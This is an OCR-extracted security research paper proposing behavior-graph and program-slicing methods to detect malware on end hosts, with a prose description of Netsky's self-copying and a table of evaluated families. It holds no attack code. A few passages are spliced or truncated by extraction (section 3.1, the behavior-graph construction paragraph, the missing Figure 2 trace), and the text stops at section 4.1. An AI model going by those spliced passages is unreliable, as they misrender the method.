"google_gemma-3-12b-it_contains_pii": [[0, 2936, false], [2936, 6559, null], [6559, 9849, null], [9849, 13138, null], [13138, 14207, null], [14207, 15004, null], [15004, 17198, null], [17198, 18873, null], [18873, 20556, null], [20556, 22641, null], [22641, 24752, null], [24752, 28079, null], [28079, 31515, null], [31515, 34311, null], [34311, 36633, null], [36633, 40160, null], [40160, 42484, null], [42484, 42992, null], [42992, 44896, null], [44896, 47907, null], [47907, 50031, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2936, true], [2936, 6559, null], [6559, 9849, null], [9849, 13138, null], [13138, 14207, null], [14207, 15004, null], [15004, 17198, null], [17198, 18873, null], [18873, 20556, null], [20556, 22641, null], [22641, 24752, null], [24752, 28079, null], [28079, 31515, null], [31515, 34311, null], [34311, 36633, null], [36633, 40160, null], [40160, 42484, null], [42484, 42992, null], [42992, 44896, null], [44896, 47907, null], [47907, 50031, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 50031, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 50031, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 50031, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 50031, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 50031, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 50031, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 50031, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 50031, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 50031, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 50031, null]], "pdf_page_numbers": [[0, 2936, 1], [2936, 6559, 2], [6559, 9849, 3], [9849, 13138, 4], [13138, 14207, 5], [14207, 15004, 6], [15004, 17198, 7], [17198, 18873, 8], [18873, 20556, 9], [20556, 22641, 10], [22641, 24752, 11], [24752, 28079, 12], [28079, 31515, 13], [31515, 34311, 14], [34311, 36633, 15], [36633, 40160, 16], [40160, 42484, 17], [42484, 42992, 18], [42992, 44896, 19], [44896, 47907, 20], [47907, 50031, 21]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 50031, 0.0]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
70ffec1c81746592e62edbf2460fc15ca9870994
Effective and Efficient Malware Detection at the End Host Clemens Kolbitsch∗, Paolo Milani Comparetti∗, Christopher Kruegel‡, Engin Kirda§, Xiaoyong Zhou†, and XiaoFeng Wang† ∗Secure Systems Lab, TU Vienna {ck,pmilani}@seclab.tuwien.ac.at ‡UC Santa Barbara chris@cs.ucsb.edu §Institute Eurecom, Sophia Antipolis kirda@eurecom.fr †Indiana University at Bloomington {zhou,xw7}@indiana.edu Abstract Malware is one of the most serious security threats on the Internet today. In fact, most Internet problems such as spam e-mails and denial of service attacks have malware as their underlying cause. That is, computers that are compromised with malware are often networked together to form botnets, and many attacks are launched using these malicious, attacker-controlled networks. With the increasing significance of malware in Internet attacks, much research has concentrated on developing techniques to collect, study, and mitigate malicious code. Without doubt, it is important to collect and study malware found on the Internet. However, it is even more important to develop mitigation and detection techniques based on the insights gained from the analysis work. Unfortunately, current host-based detection approaches (i.e., anti-virus software) suffer from ineffective detection models. These models concentrate on the features of a specific malware instance, and are often easily evadable by simple obfuscation or polymorphism. Also, detectors that check for the presence of a sequence of system calls exhibited by a malware instance are often evadable by system call reordering. In order to address the shortcomings of ineffective models, several dynamic detection approaches have been proposed that aim to identify the behavior exhibited by a malware family. Although promising, these approaches are unfortunately too slow to be used as real-time detectors on the end host, and they often require cumbersome virtual machine technology. In this paper, we propose a novel malware detection approach that is both effective and efficient, and thus, can be used to replace or complement traditional anti-virus software at the end host. Our approach first analyzes a malware program in a controlled environment to build a model that characterizes its behavior. Such models describe the information flows between the system calls essential to the malware’s mission, and therefore, cannot be easily evadable by simple obfuscation or polymorphic techniques. Then, we extract the program slices responsible for such information flows. For detection, we execute these slices to match our models against the runtime behavior of an unknown program. Our experiments show that our approach can effectively detect running malicious code on an end user’s host with a small overhead. 1 Introduction Malicious code, or malware, is one of the most pressing security problems on the Internet. Today, millions of compromised web sites launch drive-by download exploits against vulnerable hosts [35]. As part of the exploit, the victim machine is typically used to download and execute malware programs. These programs are often bots that join forces and turn into a botnet. Botnets [15] are then used by miscreants to launch denial of service attacks, send spam mails, or host scam pages. Given the malware threat and its prevalence, it is not surprising that a significant amount of previous research has focused on developing techniques to collect, study, and mitigate malicious code. For example, there have been studies that measure the size of botnets [37], the prevalence of malicious web sites [35], and the infection of executables with spyware [31]. Also, a number of server-side [4, 43] and client-side honeypots [50] were introduced that allow analysts and researchers to gather malware samples in the wild. In addition, there exist tools that can execute unknown samples and monitor their behavior [6, 28, 53, 54]. Some tools [6, 53] provide reports that summarize the activities of unknown programs at the level of Windows API or system calls. Such reports can be evaluated to find clusters of samples that behave similarly [5, 7] or to classify the type of observed, malicious activity [39]. Other tools [54] incorporate data flow into the analysis, which results in a more comprehensive view of a program’s activity in the form of taint graphs. While it is important to collect and study malware, this is only a means to an end. In fact, it is crucial that the insight obtained through malware analysis is translated into detection and mitigation capabilities that allow one to eliminate malicious code running on infected machines. Considerable research effort was dedicated to the extraction of network-based detection models. Such models are often manually-crafted signatures loaded into intrusion detection systems [33] or bot detectors [20]. Other models are generated automatically by finding common tokens in network streams produced by malware programs (typically, worms) [32, 41]. Finally, malware activity can be detected by spotting anomalous traffic. For example, several systems try to identify bots by looking for similar connection patterns [19, 38]. While network-based detectors are useful in practice, they suffer from a number of limitations. First, a malware program has many options to render network-based detection very difficult. The reason is that such detectors cannot observe the activity of a malicious program directly but have to rely on artifacts (the traffic) that this program produces. For example, encryption can be used to thwart content-based techniques, and blending attacks [17] can change the properties of network traffic to make it appear legitimate. Second, network-based detectors cannot identify malicious code that does not send or receive any traffic. Host-based malware detectors have the advantage that they can observe the complete set of actions that a malware program performs. It is even possible to identify malicious code before it is executed at all. Unfortunately, current host-based detection approaches have significant shortcomings. An important problem is that many techniques rely on ineffective models. Ineffective models are models that do not capture intrinsic properties of a malicious program and its actions but merely pick up artifacts of a specific malware instance. As a result, they can be easily evaded. For example, traditional anti-virus (AV) programs mostly rely on file hashes and byte (or instruction) signatures [46]. Unfortunately, obfuscation techniques and code polymorphism make it straightforward to modify these features without changing the actual semantics (the behavior) of the program [11]. Another example are models that capture the sequence of system calls that a specific malware program executes. When these system calls are independent, it is easy to change their order or add irrelevant calls, thus invalidating the captured sequence. In an effort to overcome the limitations of ineffective models, researchers have sought ways to capture the malicious activity that is characteristic of a malware program (or a family). On one hand, this has led to detectors [10, 13, 25] that use sophisticated static analysis to identify code that is semantically equivalent to a malware template. Since these techniques focus on the actual semantics of a program, it is not enough for a malware sample to use obfuscation and polymorphic techniques to alter its appearance. The problem with static techniques is that static binary analysis is difficult [30]. This difficulty is further exacerbated by runtime packing and self-modifying code. Moreover, the analysis is costly, and thus, not suitable for replacing AV scanners that need to quickly scan large numbers of files. Dynamic analysis is an alternative approach to model malware behavior. In particular, several systems [22, 54] rely on the tracking of dynamic data flows (tainting) to characterize malicious activity in a generic fashion. While detection results are promising, these systems incur a significant performance overhead. Also, a special infrastructure (virtual machine with shadow memory) is required to keep track of the taint information. As a result, static and dynamic analysis approaches are often employed in automated malware analysis environments (for example, at anti-virus companies or by security researchers), but they are too inefficient to be deployed as detectors on end hosts. In this paper, we propose a malware detection approach that is both effective and efficient, and thus, can be used to replace or complement traditional AV software at the end host. For this, we first generate effective models that cannot be easily evaded by simple obfuscation or polymorphic techniques. More precisely, we execute a malware program in a controlled environment and observe its interactions with the operating system. Based on these observations, we generate fine-grained models that capture the characteristic, malicious behavior of this program. This analysis can be expensive, as it needs to be run only once for a group of similar (or related) malware executables. The key of the proposed approach is that our models can be efficiently matched against the runtime behavior of an unknown program. This allows us to detect malicious code that exhibits behavior that has been previously associated with the activity of a certain malware strain. The main contributions of this paper are as follows: - We automatically generate fine-grained (effective) models that capture detailed information about the behavior exhibited by instances of a malware family. These models are built by observing a malware sample in a controlled environment. - We have developed a scanner that can efficiently match the activity of an unknown program against our behavior models. To achieve this, we track dependencies between system calls without requiring expensive taint analysis or special support at the end host. - We present experimental evidence that demonstrates that our approach is feasible and usable in practice. 2 System Overview The goal of our system is to effectively and efficiently detect malicious code at the end host. Moreover, the system should be general and not incorporate a priori knowledge about a particular malware class. Given the freedom that malware authors have when crafting malicious code, this is a challenging problem. To attack this problem, our system operates by generating detection models based on the observation of the execution of malware programs. That is, the system executes and monitors a malware program in a controlled analysis environment. Based on this observation, it extracts the behavior that characterizes the execution of this program. The behavior is then automatically translated into detection models that operate at the host level. Our approach allows the system to quickly detect and eliminate novel malware variants. However, it is reactive in the sense that it must observe a certain, malicious behavior before it can properly respond. This introduces a small delay between the appearance of a new malware family and the availability of appropriate detection models. We believe that this is a trade-off that is necessary for a general system that aims to detect and mitigate malicious code with a priori unknown behavior. In some sense, the system can be compared to the human immune system, which also reacts to threats by first detecting intruders and then building appropriate antibodies. Also, it is important to recognize that it is not required to observe every malware instance before it can be detected. Instead, the proposed system abstracts (to some extent) program behavior from a single, observed execution trace. This allows the detection of all malware instances that implement similar functionality. Modeling program behavior. To model the behavior of a program and its security-relevant activity, we rely on system calls. Since system calls capture the interactions of a program with its environment, we assume that any relevant security violation is visible as one or more unintended interactions. Of course, a significant amount of research has focused on modeling legitimate program behavior by specifying permissible sequences of system calls [18, 48]. Unfortunately, these techniques cannot be directly applied to our problem. The reason is that malware authors have a large degree of freedom in rearranging the code to achieve their goals. For example, it is very easy to reorder independent system calls or to add irrelevant calls. Thus, we cannot represent suspicious activity as system call sequences that we have observed. Instead, a more flexible representation is needed. This representation must capture true relationships between system calls but allow independent calls to appear in any order. For this, we represent program behavior as a behavior graph where nodes are (interesting) system calls. An edge is introduced from a node \( x \) to node \( y \) when the system call associated with \( y \) uses as argument some output that is produced by system call \( x \). That is, an edge represents a data dependency between system calls \( x \) and \( y \). Moreover, we only focus on a subset of interesting system calls that can be used to carry out malicious activity. At a conceptual level, the idea of monitoring a piece of malware and extracting a model for it bears some resemblance to previous signature generation systems [32, 41]. In both cases, malicious activity is recorded, and this activity is then used to generate detection models. In the case of signature generation systems, network packets sent by worms are compared to traffic from benign applications. The goal is to extract tokens that are unique to worm flows and, thus, can be used for network-based detection. At a closer look, however, the differences between previous work and our approach are significant. While signature generation systems extract specific, byte-level descriptions of malicious traffic (similar to virus scanners), the proposed approach targets the semantics of program executions. This requires different means to observe and model program behavior. Moreover, our techniques to identify malicious activity and then perform detection differ as well. Making detection efficient. In principle, we can directly use the behavior graph to detect malicious activity at the end host. For this, we monitor the system calls that an unknown program issues and match these calls with nodes in the graph. When enough of the graph has been matched, we conclude that the running program exhibits behavior that is similar to previously-observed, malicious activity. At this point, the running process can be terminated and its previous, persistent modifications to the system can be undone. Unfortunately, there is a problem with the previously sketched approach. The reason is that, for matching system calls with nodes in the behavior graph, we need to have information about data dependencies between the arguments and return values of these systems calls. Recall that an edge from node \( x \) to \( y \) indicates that there is a data flow from system call \( x \) to \( y \). As a result, when observing \( x \) and \( y \), it is not possible to declare a match with the behavior graph \( x \rightarrow y \). Instead, we need to know whether \( y \) uses values that \( x \) has produced. Otherwise, independent system calls might trigger matches in the behavior graph, leading to an unacceptable high number of false positives. Previous systems have proposed dynamic data flow tracking (tainting) to determine dependencies between system calls. However, tainting incurs a significant performance overhead and requires a special environ- ment (typically, a virtual machine with shadow memory). Hence, taint-based systems are usually only deployed in analysis environments but not at end hosts. In this paper, we propose an approach that allows us to detect previously-seen data dependencies by monitoring only system calls and their arguments. This allows efficient identification of data flows without requiring expensive tainting and special environments (virtual machines). Our key idea to determine whether there is a data flow between a pair of system calls \( x \) and \( y \) that is similar to a previously-observed data flow is as follows: Using the observed data flow, we extract those parts of the program (the instructions) that are responsible for reading the input and transforming it into the corresponding output (a kind of program slice [52]). Based on this program slice, we derive a symbolic expression that represents the semantics of the slice. In other words, we extract an expression that can essentially pre-compute the expected output, based on some input. In the simplest case, when the input is copied to the output, the symbolic expression captures the fact that the input value is identical to the output value. Of course, more complicated expressions are possible. In cases where it is not possible to determine a closed symbolic expression, we can use the program slice itself (i.e., the sequence of program instructions that transforms an input value into its corresponding output, according to the functionality of the program). Given a program slice or the corresponding symbolic expression, an unknown program can be monitored. Whenever this program invokes a system call \( x \), we extract the relevant arguments and return value. This value is then used as input to the slice or symbolic expression, computing the expected output. Later, whenever a system call \( y \) is invoked, we check its arguments. When the value of the system call argument is equal to the previously-computed, expected output, then the system has detected the data flow. Using data flow information that is computed in the previously-described fashion, we can increase the precision of matching observed system calls against the behavior graph. That is, we can make sure that a graph with a relationship \( x \rightarrow y \) is matched only when we observe \( x \) and \( y \), and there is a data flow between \( x \) and \( y \) that corresponds to the semantics of the malware program that is captured by this graph. As a result, we can perform more accurate detection and reduce the false positive rate. 3 System Details In this section, we provide more details on the components of our system. In particular, we first discuss how we characterize program activity via behavior graphs. Then, we introduce our techniques to automatically extract such graphs from observing binaries. Finally, we present our approach to match the actions of an unknown binary to previously-generated behavior graphs. 3.1 Behavior Graphs: Specifying Program Activity As a first step, we require a mechanism to describe the activity of programs. According to previous work [12], such a specification language for malicious behaviors has to satisfy three requirements: First, a specification must not constrain independent operations. The second requirement is that a specification must relate dependent operations. Third, the specification must only contain security-relevant operations. The authors in [12] propose malspecs as a means to capture program behavior. A malicious specification (malspec) is a directed acyclic graph (DAG) with nodes labeled using system calls from an alphabet \( \Sigma \) and edges labeled using logic formulas in a logic \( \mathcal{L}_{dep} \). Clearly, malspecs satisfy the first two requirements. That is, independent nodes (system calls) are not connected, while related operations are connected via a series of edges. The paper also mentions a function \( \text{IsTrivialComponent} \) that can identify and remove parts of the graph that are not security-relevant (to meet the third requirement). For this work, we use a formalism called behavior graphs. Behavior graphs share similarities with malspecs. In particular, we also express program behavior as directed acyclic graphs where nodes represent system calls. However, we do not have unconstrained system call arguments, and the semantics of edges is somewhat different. We define a system call \( s \in \Sigma \) as a function that maps a set of input arguments \( a_1, \ldots, a_n \) into a set of output values \( o_1, \ldots, o_k \). For each input argument of a system call \( a_i \), the behavior graph captures where the value of this argument is derived from. For this, we use a function \( f_{a_i} \in F \). Before we discuss the nature of the functions in \( F \) in more detail, we first describe where a value for a system call can be derived from. A system call value can come from three possible sources (or a mix thereof): First, it can be derived from the output argument(s) of previous system calls. Second, it can be read from the process address space (typically, the initialized data section – the \( \text{bss} \) segment). Third, it can be produced by the immediate argument of a machine instruction. As mentioned previously, a function is used to capture the input to a system call argument \( a_i \). More precisely, the function \( f_{a_i} \), for an argument \( a_i \) is defined as \( f_{a_i} : x_1, x_2, \ldots, x_n \rightarrow y_i \), where each \( x_i \) represents the output \( o_j \) of a previous system call. The values that are read from memory are part of the function body, represented by \( l(\text{addr}) \). When the function is evaluated, graphs. This technique is needed to ensure that values that are loaded from memory (for example, keys) are not constant in the specification, but read from the process under analysis. Of course, our approach implies that the memory addresses of key data structures do not change between (polymorphic) variants of a certain malware family. In fact, this premise is confirmed by a recent observation that data structures are stable between different samples that belong to the same malware class [14]. Finally, constant values produced by instructions (through immediate operands) are implicitly encoded in the function body. Consider the case in which a system call argument \( a_i \) is the constant value 0, for example, produced by a \texttt{push $0}\) instruction. Here, the corresponding function is a constant function with no arguments \( f_{a_i} : \rightarrow 0 \). Note that a function \( f \in F \) can be expressed in two different forms: as a (symbolic) formula or as an algorithm (more precisely, as a sequence of machine instructions – this representation is used in case the relation is too complex for a mathematical expression). Whenever an input argument \( a_i \) for system call \( y \) depends on the some output \( o_j \) produced by system call \( x \), we introduce an edge from the node that corresponds to \( x \) to the node that corresponds to \( y \). Thus, edges encode dependencies (i.e., temporal relationships) between system calls. Given the previous discussion, we can define behavior graphs \( G \) more formally as: \( G = (V, E, F, \delta) \), where: - \( V \) is the set of vertices, each representing a system call \( s \in \Sigma \) - \( E \) is the set of edges, \( E \subseteq V \times V \) - \( F \) is the set of functions \( \bigcup f : x_1, x_2, \ldots, x_n \rightarrow y \), where each \( x_i \) is an output arguments \( o_j \) of system call \( s \in \Sigma \) - \( \delta \), which assigns a function \( f_i \) to each system call argument \( a_i \) Intuitively, a behavior graph encodes relationships between system calls. That is, the functions \( f_i \) for the arguments \( a_i \) of a system call \( s \) determine how these arguments depend on the outputs of previous calls, as well as program constants and memory values. Note that these functions allow one to \textit{pre-compute} the expected arguments of a system call. Consider a behavior graph \( G \) where an input argument \( a \) of a system call \( s_t \) depends on the outputs of two previous calls \( s_p \) and \( s_q \). Thus, there is a function \( f_a \) associated with \( a \) that has two inputs. Once we observe \( s_p \) and \( s_q \), we can use the outputs \( o_p \) and \( o_q \) of these system calls and plug them into \( f_a \). At this point, we know the expected value of \( a \), assuming that the program execution follows the semantics encoded in the behavior graph. Thus, when we observe at a later point the invocation of \( s_t \), we can check whether its actual argument value for \( a \) matches our precomputed value \( f_a(o_p, o_q) \). If this is the case, we have high confidence that the program executes a system call whose input is related (depends on) the outputs of previous calls. This is the key idea of our proposed approach: We can identify relationships between system calls without tracking any information at the instruction-level during runtime. Instead, we rely solely on the analysis of system call arguments and the functions in the behavior graph that capture the semantics of the program. ### 3.2 Extracting Behavior Graphs As mentioned in the previous section, we express program activity as behavior graphs. In this section, we describe how these behavior graphs can be automatically constructed by observing the execution of a program in a controlled environment. #### Initial Behavior Graph As a first step, an unknown malware program is executed in an extended version of Anubis [6, 7], our dynamic malware analysis environment. Anubis records all the disassembled instructions (and the system calls) that the binary under analysis executes. We call this sequence of instructions an \textit{instruction log}. In addition, Anubis also extracts data dependencies using taint analysis. That is, the system taints (marks) each byte that is returned by a system call with a unique label. Then, we keep track of each labeled byte as the program execution progresses. This allows us to detect that the output (result) of one system call is used as an input argument for another, later system call. While the instruction log and the taint labels provide rich information about the execution of the malware program, this information is not sufficient. Consider the case in which an instruction performs an indirect memory access. That is, the instruction \textit{reads} a memory value from a location \( L \) whose address is given in a register or another memory location. In our later analysis, we need to know which instruction was the last one to \textit{write} to this location \( L \). Unfortunately, looking at the disassembled instruction alone, this is not possible. Thus, to make the analysis easier in subsequent steps, we also maintain a \textit{memory log}. This log stores, for each instruction that accesses memory, the locations that this instruction reads from and writes to. Another problem is that the previously-sketched taint tracking approach only captures data dependencies. For example, when data is written to a file that is previously read as part of a copy operation, our system would detect such a dependency. However, it does not consider control dependencies. To see why this might be relevant, consider that the amount of data written as part of the copy operation is determined by the result of a system call that returns the size of the file that is read. The file size returned by the system call might be used in a loop that controls how often a new block of data needs to be copied. While this file size has an indirect influence on the (number of) write operation, there is no data dependency. To capture indirect dependencies, our system needs to identify the scope of code blocks that are controlled by tainted data. The start of such code blocks is identified by checking for branch operations that use tainted data as arguments. To identify the end of the scope, we leverage a technique proposed by Zhang et al. [55]. More precisely, we employ their no preprocessing without caching algorithm to find convergence points in the instruction log that indicate that the different paths of a conditional statement or a loop have met, indicating the end of the (dynamic) scope. Within a tainted scope, the results of all instructions are marked with the label(s) used in the branch operation, similar to the approach presented in [22]. At this point, our analysis has gathered the complete log of all executed instructions. Moreover, operands of all instructions are marked with taint labels that indicate whether these operands have data or control dependencies on the output of previous system calls. Based on this information, we can construct an initial behavior graph. To this end, every system call is mapped into a node of the graph, labeled with the name of this system call. T o this end, every system call is mapped into a node. If this system call is called from another system call, an edge is introduced from node in the graph, labeled with the name of this system call. In this example, the behavior graph that we generate specifically contains the string AVProtect9x.exe. However, obviously, a virus writer might choose to use random names when creating a new file. In this case, our behavior graph would contain the system calls that are used to create this random name. Hence, the randomization routines that are used (e.g., checking the current time and appending a constant string to it) would be a part of the behavior specification. Figure 2 shows an excerpt of the trace that we recorded for Netsky. This is part of the input that the behavior graph is built from. On Line 1, one can see that the worm obtains the name of executable of the current process (i.e., the name of its own file). Using this name, it opens the file on Line 3 and obtains a handle to it. On Line 5, a new file called AVProtect9x.exe is created, where the worm will copy its code to. On Lines 8 to 10, the worm reads its own program code, copying itself into the newly created file. ![Diagram of the behavior graph for Netsky](image) **Figure 1: Partial behavior graph for Netsky.** ### Computing Argument Functions In the next step, we have to compute the functions \( f \in F \) that are associated with the arguments of system call nodes. That is, for each system call argument, we first have to identify the sources that can influence the value of this argument. Also, we need to determine how the values from the sources are manipulated to derive the argument value. For this, we make use of binary program slicing. Finally, we need to translate the sequence of instructions that compute the value of an argument (based on the values of the sources) into a function. Program slicing. The goal of the program slicing process is to find all sources that directly or indirectly influence the value of an argument $a$ of system call $s$, which is also called a sink. To this end, we first use the function signature for $s$ to determine the type and the size of argument $a$. This allows us to determine the bytes that correspond to the sink $a$. Starting from these bytes, we use a standard dynamic slicing approach [2] to go backwards, looking for instructions that define one of these bytes. For each instruction found in this manner, we look at its operands and determine which values the instruction uses. For each value that is used, we locate the instruction that defines this value. This process is continued recursively. As mentioned previously, it is sometimes not sufficient to look at the instruction log alone to determine the instruction that has defined the value in a certain memory location. To handle these cases, we make use of the memory log, which helps us to find the previous write to a certain memory location. Following def-use chains would only include instructions that are related to the sink via data dependencies. However, we also wish to include control flow dependencies into a slice. Recall from the previous subsection that our analysis computes tainted scopes (code that has a control flow dependency on a certain tainted value). Thus, when instructions are included into a slice that are within a tainted scope, the instructions that create this scope are also included, as well as the code that those instructions depend upon. The recursive analysis chains increasingly add instructions to a slice. A chain terminates at one of two possible endpoints. One endpoint is the system call that produces a (tainted) value as output. For example, consider that we trace back the bytes that are written to a file (the argument that represents the write buffer). The analysis might determine that these bytes originate from a system call that reads the data from the network. That is, the values come from the “outside,” and we cannot go back any further. Of course, we expect that there are edges from all sources to the sink that eventually uses the values produced by the sources. Another endpoint is reached when a value is produced as an immediate operand of an instruction or read from the statically initialized data segment. In the previous example, the bytes that are written to the file need not have been read previously. Instead, they might be originating from a string embedded in the program binary, and thus, coming from “within.” When the program slicer finishes for a system call argument $a$, it has marked all instructions that are involved in computing the value of $a$. That is, we have a subset (a slice) of the instruction log that “explains” (1) how the value for $a$ was computed, and (2) which sources were involved. As mentioned before, these sources can be constants produced by the immediate operands of instructions, values read from memory location $addr$ (without any other instruction previously writing to this address), and the output of previous system calls. Translating slices into functions. A program slice contains all the instructions that were involved in computing a specific value for a system call argument. However, this slice is not a program (a function) that can be directly run to compute the outputs for different inputs. A slice can (and typically does) contain a single machine instruction of the binary program more than once, often with different operands. For example, consider a loop that is executed multiple times. In this case, the instructions of the binary that make up the loop body appear multiple times in the slice. However, for our function, we would like to have code that represents the loop itself, not the unrolled version. This is because when a different input is given to the loop, it might execute a different number of times. Thus, it is important to represent the function as the actual loop code, not as an unrolled sequence of instructions. To translate a slice into a self-contained program, we first mark all instructions in the binary that appear at least once in the slice. Note that our system handles packed binaries. That is, when a malware program is packed, we consider the instructions that it executes after the unpacking routine as the relevant binary code. All instructions that do not appear in the slice are replaced with no operation statements (nops). The input to this code depends on the sources of the slice. When a source is a constant, immediate operand, then this constant is directly included into the function. When the source is a read operation from a memory address $addr$ that was not previously written by the program, we replace it with a special function that reads the value at $addr$ when a program is analyzed. Finally, outputs of previous system calls are replaced with variables. In principle, we could now run the code as a function, simply providing as input the output values that we observe from previous system calls. This would compute a result, which is the pre-computed (expected) input argument for the sink. Unfortunately, this is not that easy. The reason is that the instructions that make up the function are taken from a binary program. This binary is made up of procedures, and these procedures set up stack frames that allow them to access local variables via offsets to the base pointer (register %ebp) or the stack pointer (x86 register %esp). The problem is that operations that manipulate the base pointer or the stack pointer are often not part of the slice. As a result, they are also not part of the function code. Unfortunately, this means that local variable accesses do not behave as expected. To compensate for that, we have to go through the instruction log (and the program binary) and fix the stack. More precisely, we analyze the code and add appropriate instructions that manipulate the stack and, if needed, the frame pointer appropriately so that local variable accesses succeed. For this, some knowledge about compiler-specific mechanisms for handling procedures and stack frames is required. Currently, our prototype slicer is able to handle machine code generated from standard C and C++ code, as well as several human-written/optimized assembler code idioms that we encountered (for example, code that is compiled without the frame pointer). Once the necessary code is added to fix the stack, we have a function (program) at our disposal that captures the semantics of that part of the program that computes a particular system call argument based on the results of previous calls. As mentioned before, this is useful, because it allows us to pre-compute the argument of a system call that we would expect to see when an unknown program exhibits behavior that conforms to our behavior graph. Optimizing Functions Once we have extracted a slice for a system call argument and translated it into a corresponding function (program), we could stop there. However, many functions implement a very simple behavior; they copy a value that is produced as output of a system call into the input argument of a subsequent call. For example, when a system call such as NCopyFile produces an opaque handle, this handle is used as input by all subsequent system calls that operate on this file. Unfortunately, the chain of copy operations can grow quite long, involving memory accesses and stack manipulation. Thus, it would be beneficial to identify and simplify instruction sequences. Optimal, the complete sequence can be translated into a formula that allows us to directly compute the expected output based on the formula’s inputs. To simplify functions, we make use of symbolic execution. More precisely, we assign symbolic values to the input parameters of a function and use a symbolic execution engine developed previously [23]. Once the symbolic execution of the function has finished, we obtain a symbolic expression for the output. When the symbolic execution engine does not need to perform any approximations (e.g., widening in the case of loops), then we can replace the algorithmic representation of the slice with this symbolic expression. This allows us to significantly shorten the time it takes to evaluate functions, especially those that only move values around. For complex functions, we fall back to the explicit machine code representation. 3.3 Matching Behavior Graphs For every malware program that we analyze in our controlled environment, we automatically generate a behavior graph. These graphs can then be used for detection at the end host. More precisely, for detection, we have developed a scanner that monitors the system call invocations (and arguments) of a program under analysis. The goal of the scanner is to efficiently determine whether this program exhibits activity that matches one of the behavior graphs. If such a match occurs, the program is considered malicious, and the process is terminated. We could also imagine a system that unrolls the persistent modifications that the program has performed. For this, we could leverage previous work [45] on safe execution environments. In the following, we discuss how our scanner matches a stream of system call invocations (received from the program under analysis) against a behavior graph. The scanner is a user-mode process that runs with administrative privileges. It is supported by a small kernel-mode driver that captures system calls and arguments of processes that should be monitored. In the current design, we assume that the malware process is running under the normal account of a user, and thus, cannot subvert the kernel driver or attack the scanner. We believe that this assumption is reasonable because, for recent versions of Windows, Microsoft has made significant effort to have users run without root privileges. Also, processes that run executables downloaded from the Internet can be automatically started in a low-integrity mode. Interestingly, we have seen malware increasingly adapting to this new landscape, and a substantial fraction can now successfully execute as a normal user. The basic approach of our matching algorithm is the following: First, we partition the nodes of a behavior graph into a set of active nodes and a set of inactive nodes. The set of active nodes contains those nodes that have already been matched with system call(s) in the stream. Initially, all nodes are inactive. When a new system call $s$ arrives, the scanner visits all inactive nodes in the behavior graph that have the correct type. That is, when a system call $\text{NtOpenFile}$ is seen, we examine all inactive nodes that correspond to an $\text{NtOpenFile}$ call. For each of these nodes, we check whether all its parent nodes are active. A parent node for node $N$ is a node that has an edge to $N$. When we find such a node, we further have to ensure that the system call has the “right” arguments. More precisely, we have to check all functions $f_i : 1 \leq i \leq k$ associated with the $k$ input arguments of the system call $s$. However, for performance reasons, we do not do this immediately. Instead, we only check the simple functions. Simple functions are those for which a symbolic expression exists. Most often, these functions check for the equality of handles. The checks for complex functions, which are functions that represent dependencies as programs, are deferred and optimistically assumed to hold. To check whether a (simple) function $f_i$ holds, we use the output arguments of the parent node(s) of $N$. More precisely, we use the appropriate values associated with the parent node(s) of $N$ as the input to $f_i$. When the result of $f_i$ matches the input argument to system call $s$, then we have a match. When all arguments associated with simple functions match, then node $N$ can be activated. Moreover, once $s$ returns, the values of its output parameters are stored with node $N$. This is necessary because the output of $s$ might be needed later as input for a function that checks the arguments of $N$’s child nodes. So far, we have only checked dependencies between system calls that are captured by simple functions. As a result, we might activate a node $y$ as the child of $x$, although there exists a complex dependency between these two system calls that is not satisfied by the actual program execution. Of course, at one point, we have to check these complex relationships (functions) as well. This point is reached when an interesting node in the behavior graph is activated. Interesting nodes are nodes that are (a) associated with security-relevant system calls and (b) at the “bottom” of the behavior graph. With security-relevant system calls, we refer to all calls that write to the file system, the registry, or the network. In addition, system calls that start new processes or system services are also security-relevant. A node is at the “bottom” of the behavior graph when it has no outgoing edges. When an interesting node is activated, we go back in the behavior graph and check all complex dependencies. That is, for each active node, we check all complex functions that are associated with its arguments (in a way that is similar to the case for simple functions, as outlined previously). When all complex functions hold, the node is marked as confirmed. If any of the complex functions associated with the input arguments of an active node $N$ does not hold, our previous optimistic assumption has been invalidated. Thus, we deactivate $N$ as well as all nodes in the subgraph rooted in $N$. Intuitively, we use the concept of interesting nodes to capture the case in which a malware program has demonstrated a chain of activities that involve a series of system calls with non-trivial dependencies between them. Thus, we declare a match as soon as any interesting node has been confirmed. However, to avoid cases of overly generic behavior graphs, we only report a program as malware when the process of confirming an interesting node involves at least one complex dependency. Since the confirmed activation of a single interesting node is enough to detect a malware sample, typically only a subset of the behavior graph of a malware sample is employed for detection. More precisely, each interesting node, together with all of its ancestor nodes and the dependencies between these nodes, can be used for detection independently. Each of these subgraphs is itself a behavior graph that describes a specific set of actions performed by a malware program (that is, a certain behavioral trait of this malware). 4 Evaluation We claim that our system delivers effective detection with an acceptable performance overhead. In this section, we first analyze the detection capabilities of our system. Then, we examine the runtime impact of our prototype implementation. In the last section, we describe two examples of behavior graphs in more detail. <table> <thead> <tr> <th>Name</th> <th>Type</th> </tr> </thead> <tbody> <tr> <td>Allaple</td> <td>Exploit-based worm</td> </tr> <tr> <td>Bagle</td> <td>Mass-mailing worm</td> </tr> <tr> <td>Mytob</td> <td>Mass-mailing worm</td> </tr> <tr> <td>Agent</td> <td>Trojan</td> </tr> <tr> <td>Netsky</td> <td>Mass-mailing worm</td> </tr> <tr> <td>Mydoom</td> <td>Mass-mailing worm</td> </tr> </tbody> </table> Table 1: Malware families used for evaluation. 4.1 Detection Effectiveness To demonstrate that our system is effective in detecting malicious code, we first generated behavior graphs for six popular malware families. An overview of these families is provided in Table 1. These malware 